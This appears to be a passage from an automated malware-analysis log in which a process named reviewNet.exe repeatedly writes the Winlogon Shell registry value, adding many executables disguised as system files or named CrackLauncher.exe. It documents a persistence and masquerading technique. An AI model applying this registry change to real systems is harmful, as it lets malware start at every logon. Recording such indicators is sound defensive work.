\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\", \"C:\\Program Files\\Internet Explorer\\ja-JP\\lsass.exe\", \"C:\\Users\\Admin\\wininit.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\reviewNet.exe\", \"C:\\Users\\All Users\\Application Data\\cmd.exe\", \"C:\\ComsurrogateServerdll\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Users\\Public\\Downloads\\reviewNet.exe\", \"C:\\Windows\\SoftwareDistribution\\DataStore\\smss.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", 